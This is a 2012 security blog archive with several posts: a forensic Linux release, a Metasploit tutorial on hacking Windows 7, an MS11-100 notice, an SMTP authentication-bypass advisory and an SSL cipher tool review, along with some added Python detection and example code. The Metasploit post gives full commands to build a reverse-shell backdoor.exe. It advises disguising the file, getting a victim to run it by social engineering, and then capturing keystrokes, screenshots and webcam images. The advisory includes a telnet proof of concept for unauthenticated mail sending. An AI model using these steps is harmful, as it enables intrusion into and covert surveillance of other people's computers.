Friday, January 13, 2012

DEFT Linux 7 Computer Forensic Live CD - Released

DEFT (Digital Evidence & Forensic Toolkit) is a customised distribution of the Lubuntu live Linux CD. It is an easy-to-use system that includes excellent hardware detection and some of the best open-source applications dedicated to incident response and computer forensics.   

New features:

- Based on Lubuntu 11.10
- Installable Distro
- Linux kernel 3.0.0-12, USB 3 ready
- Libewf 20100226
- Afflib 3.6.14
- TSK 3.2.3
- Autopsy 2.24
- Digital Forensic Framework 1.2
- PTK Forensic 1.0.5 DEFT edition
- Maltego CE
- KeepNote 0.7.6
- Xplico 0.7.1
- Scalpel 2
- Hunchbacked Foremost 0.6
- Findwild 1.3
- Bulk Extractor 1.1
- Emule Forensic 1.0
- Guymager 0.6.3-1
- Dhash 2
- Cyclone wizard acquire tool
- SQLite Database Browser 2.0b1
- BitPim 1.0.7
- Bbwhatsapp database converter
- Creepy 0.1.9
- Hydra 7.1
- Log2timeline 0.60
- Wine 1.3.28


Thursday, January 12, 2012

Hack Windows 7 with Metasploit

In this tutorial I will exploit a Windows 7 SP1 OS using Metasploit. I will be using the exploit/multi/handler module, which “provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework”.
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload, type this in the terminal without the quotes:

msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe

I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is

After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 4444

If all goes well, you should be able to establish a meterpreter session. Type sysinfo to gather some info on the machine. To see the other meterpreter commands, type help. Other meterpreter commands can capture a screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
It's cool to take a screenshot with the meterpreter command screenshot.
Adnan Anjum.
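
From the defender's side, the session described above appears as an executable in a user-writable directory initiating an outbound TCP connection. The following is an added example, not part of the original post, that scores constructed connection events; the field names are modelled on Sysmon's network-connection event, and the path and port lists are assumptions.

```python
import ipaddress

# Field names follow Sysmon's network-connection event (Image, DestinationIp,
# DestinationPort, Initiated); the two lists below are assumptions for this example.
USER_WRITABLE = ("\\users\\", "\\windows\\temp\\", "\\programdata\\")
EXPECTED_PORTS = {53, 80, 443}

def score_event(ev):
    """Return the reasons an outbound connection looks like a payload
    calling back to a listener; an empty list means nothing was flagged."""
    dst = ipaddress.ip_address(ev["DestinationIp"])
    if not ev["Initiated"] or dst.is_loopback:
        return []                      # inbound or on-host traffic: out of scope
    reasons = []
    if any(d in ev["Image"].lower() for d in USER_WRITABLE):
        reasons.append("image in user-writable path")
    if ev["DestinationPort"] not in EXPECTED_PORTS:
        reasons.append("unexpected destination port")
    if ev["DestinationPort"] == 4444:
        reasons.append("port 4444, the LPORT used in the post")
    return reasons

def triage(events, threshold=2):
    """Keep events with at least `threshold` reasons, highest score first."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= threshold:
            hits.append((ev["Image"], ev["DestinationIp"], ev["DestinationPort"], reasons))
    return sorted(hits, key=lambda h: len(h[3]), reverse=True)

# Constructed sample events (not captured from a real host).
SAMPLE = [
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Users\bob\Downloads\invoice.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 4444, "Initiated": True},
    {"Image": r"C:\Users\bob\AppData\Local\Updater\sync.exe",
     "DestinationIp": "198.51.100.9", "DestinationPort": 8443, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "DestinationIp": "127.0.0.1", "DestinationPort": 4444, "Initiated": True},
]

if __name__ == "__main__":
    for image, ip, port, reasons in triage(SAMPLE):
        print(f"{image} -> {ip}:{port}: {', '.join(reasons)}")
```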

Monday, January 9, 2012

MS11-100 DoS PoC exploit published

If you have not yet patched for vulnerability MS11-100, you might want to do it ASAP, because the DoS PoC exploit for this vulnerability was published three days ago.

More information about the vulnerability and patches at

Simple Mail Server - SMTP Authentication Bypass Vulnerability

Title: Simple Mail Server - SMTP Authentication Bypass Vulnerability

Software : Simple Mail Server

Software Version : 2011-12-30


Class:  Origin Validation Error  


Remote:  Yes  

Local:  No  

Published:  2012-01-08


CVSS2 Base: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)

Impact : Medium (4 < 6.4 < 8)

Bug Description :
Simple Mail Server is a tiny mail server written in C#. Mail can be sent through it without a password by using an ordinary TCP client (such as telnet).
It does not have an SMTP authentication controller.

PoC (Remarks: the domain and user alex () alex com must exist in the configuration for this test case):
telnet 25
220 TEST-121F797342 SMTP ready.
EHLO mail_of_alert
500 Not supported. Use HELO
250 OK
250 OK
354 Start mail input; end with .
From: "alex () alex com"
To: "alex () alex com"
Subject: authenticate is not required!
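
The missing control can be shown with a toy SMTP command handler. This is an added example, not code from Simple Mail Server or from the advisory: with `require_auth=False` it answers like the transcript above, and with `require_auth=True` it refuses MAIL, RCPT and DATA until AUTH PLAIN succeeds. The class, the user store and the addresses are constructed for illustration.

```python
import base64
import hmac

class SmtpSession:
    """Toy SMTP command handler; require_auth=False mirrors the advisory's server."""

    def __init__(self, users, require_auth):
        self.users = users                  # {user: password}, hypothetical store
        self.require_auth = require_auth
        self.greeted = False
        self.authed_as = None

    def handle(self, line):
        verb, _, arg = line.strip().partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.greeted = True
            return "250 OK"
        if verb == "AUTH":
            return self._auth_plain(arg)
        if verb in ("MAIL", "RCPT", "DATA"):
            if not self.greeted:
                return "503 5.5.1 Bad sequence of commands"
            if self.require_auth and self.authed_as is None:
                return "530 5.7.0 Authentication required"   # RFC 4954
            return "354 Start mail input" if verb == "DATA" else "250 OK"
        return "500 Not supported"

    def _auth_plain(self, arg):
        mech, _, blob = arg.partition(" ")
        if mech.upper() != "PLAIN":
            return "504 5.5.4 Unrecognized authentication type"
        try:                                # PLAIN = base64(authzid NUL user NUL pass)
            _, user, password = base64.b64decode(blob, validate=True).decode().split("\0")
        except ValueError:                  # bad base64, bad UTF-8 or wrong field count
            return "501 5.5.2 Cannot decode response"
        expected = self.users.get(user)
        if expected is not None and hmac.compare_digest(expected.encode(), password.encode()):
            self.authed_as = user
            return "235 2.7.0 Authentication successful"
        return "535 5.7.8 Authentication credentials invalid"

def replay(session, commands):
    """Feed client commands to a session and collect the reply to each."""
    return [session.handle(c) for c in commands]

# Constructed client input; the addresses are placeholders.
SEND = ["HELO client.example", "MAIL FROM:<a@example.test>",
        "RCPT TO:<b@example.test>", "DATA"]
```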

Friday, January 6, 2012

Perform Smart SSL Cipher Enumeration: SSLSmart

SSLSmart is a highly flexible and interactive tool aimed at improving efficiency and reducing false positives during SSL testing.
It is an advanced, Ruby-based smart SSL cipher enumeration tool that is open source, cross-platform and free. It was written because a number of tools on the Windows platform allow users to test for supported SSL cipher suites, but most only provide testers with a fixed set of cipher suites. Further, testing is performed by initiating an SSL socket connection with one cipher suite at a time, an inefficient approach that leads to false positives and often does not provide a clear picture of the true vulnerability of the server. SSLSmart is designed to combat these shortcomings.

SSLSmart Features:

SSLSmart offers a wide range of features to improve testing efficiency and reduce false positives. These features are as follows:

  • Content Scan (default): Exact server response can be seen in HTML and Text forms for each cipher suite selected for the test URL. Basically, it shows various server error messages received for weak cipher suites from live systems.
  • CONNECT Scan: Focuses only on success or failure of SSL socket connection with various cipher suites. This behavior does not offer any advantage over existing SSL testing tools and is thus likely to have similar issues with false positives. However, this scan is faster and consumes fewer network and CPU resources.
  • Dynamic Cipher Suite Support: Most SSL testing tools provide a fixed set of cipher suites. SSLSmart hooks into Ruby OpenSSL bindings and offers dynamic “on the fly” cipher suite generation capabilities.
  • Certificate Verification: SSLSmart performs server certificate verification. It uses the Firefox Root CA Certificate repository to perform Root CA verification. Additional Root CA Certificates can be added to the rootcerts.pem file or a custom .pem file can be supplied for Root CA Certificate verification.
  • Proxy Support: SSLSmart provides web proxy support. For results to be accurate, it is important to use a transparent proxy.
  • Reporting: Reports can be generated in XML, HTML and Text formats along with their verbose versions. Verbose report versions include complete application response for each cipher suite and full details of the server certificate.
  • APIs: Monkey-patched Ruby APIs that form the backbone of SSLSmart can be consumed to write custom Ruby scripts for quick tests. These APIs can be consumed by users who work with the SSLSmart gem.
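
The difference between the CONNECT scan and the Content scan in the list above can be shown with a short probe. This is an added example written in Python, not SSLSmart's own Ruby code: it offers one cipher suite per connection, requests "/" over the session, and separates suites the server actually serves content on from suites that only complete the handshake. The function names and verdict labels are assumptions of this example.

```python
import socket
import ssl

def probe(host, port, cipher, timeout=5.0):
    """Offer exactly one cipher suite, then request "/" over the session.
    Returns (handshake_ok, http_status); handshake_ok is None if not testable."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False            # certificate checks are a separate test
    ctx.verify_mode = ssl.CERT_NONE
    ctx.maximum_version = ssl.TLSVersion.TLSv1_2   # set_ciphers() does not cover TLS 1.3
    try:
        ctx.set_ciphers(cipher)
    except ssl.SSLError:                  # the local OpenSSL cannot offer this suite
        return (None, None)
    head = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw, \
                ctx.wrap_socket(raw, server_hostname=host) as tls:
            try:
                tls.sendall(f"GET / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
                head = tls.recv(4096)
            except OSError:
                pass                      # handshake succeeded, response did not
    except OSError:                       # ssl.SSLError is a subclass of OSError
        return (False, None)
    return (True, parse_status(head))

def parse_status(head):
    """Extract the numeric status from an HTTP response head, or None."""
    parts = head.split(b"\r\n", 1)[0].split()
    if len(parts) >= 2 and parts[0].startswith(b"HTTP/") and parts[1].isdigit():
        return int(parts[1])
    return None

def classify(handshake_ok, status):
    """Content-scan verdict for one suite."""
    if handshake_ok is None:
        return "not-offered"
    if not handshake_ok:
        return "rejected"
    if status is not None and 200 <= status < 400:
        return "served"
    return "handshake-only"   # a CONNECT scan would report this as supported

def scan(host, port, ciphers, probe_fn=probe):
    """Map each cipher name to its verdict; probe_fn is injectable for offline runs."""
    return {c: classify(*probe_fn(host, port, c)) for c in ciphers}
```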

What I liked the most about this tool is that SSLSmart supports XML, HTML, Text and their corresponding verbose reporting versions. In addition to details in the normal report, verbose versions include complete application responses for each cipher suite and full details of server certificates. Another feature that I liked is the API support. These APIs, which form the backbone of SSLSmart tests, can be used to write custom scripts. The SSLSmart gem includes source code and can be used by users who have Ruby installed on their systems, and it comes from McAfee Labs!

Platform Support and Installers:

SSLSmart has been tested to work on the following platforms and versions of Ruby:
Windows: Ruby 1.8.6 with wxruby (2.0.0) and builder (2.1.2).
Linux: Ruby 1.8.7/1.9.1 with wxruby (2.0.0) and builder (2.1.2).

Download SSLSmart:

SSLSmart 1.0